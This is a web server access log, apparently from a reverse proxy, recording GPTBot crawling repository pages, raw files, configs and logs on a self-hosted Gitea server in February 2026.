"/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" +[17/Feb/2026:14:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 15823] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" +[17/Feb/2026:14:08:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:14:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/" +[17/Feb/2026:14:08:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:14:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/" +[17/Feb/2026:14:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 10968] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10897] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" +[17/Feb/2026:14:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" +[17/Feb/2026:14:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" +[17/Feb/2026:14:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" +[17/Feb/2026:14:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" +[17/Feb/2026:14:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10112] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" +[17/Feb/2026:14:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" +[17/Feb/2026:14:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:14:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:14:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" +[17/Feb/2026:14:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" +[17/Feb/2026:14:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49519] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" +[17/Feb/2026:14:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71823] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" +[17/Feb/2026:14:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10086] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:14:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11660] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:14:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" +[17/Feb/2026:14:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" +[17/Feb/2026:14:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" +[17/Feb/2026:14:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" [Client 74.7.227.38] [Length 12774] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" +[17/Feb/2026:14:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 151601] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 9956] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:14:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 9950] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:14:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9956] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:14:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10153] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" +[17/Feb/2026:14:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 9919] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" +[17/Feb/2026:14:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 10964] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" +[17/Feb/2026:14:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" +[17/Feb/2026:14:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 9952] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:14:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" [Client 74.7.227.38] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" +[17/Feb/2026:14:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 9951] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:14:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:14:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10164] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" +[17/Feb/2026:14:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" +[17/Feb/2026:14:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:14:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 10975] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" +[17/Feb/2026:14:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 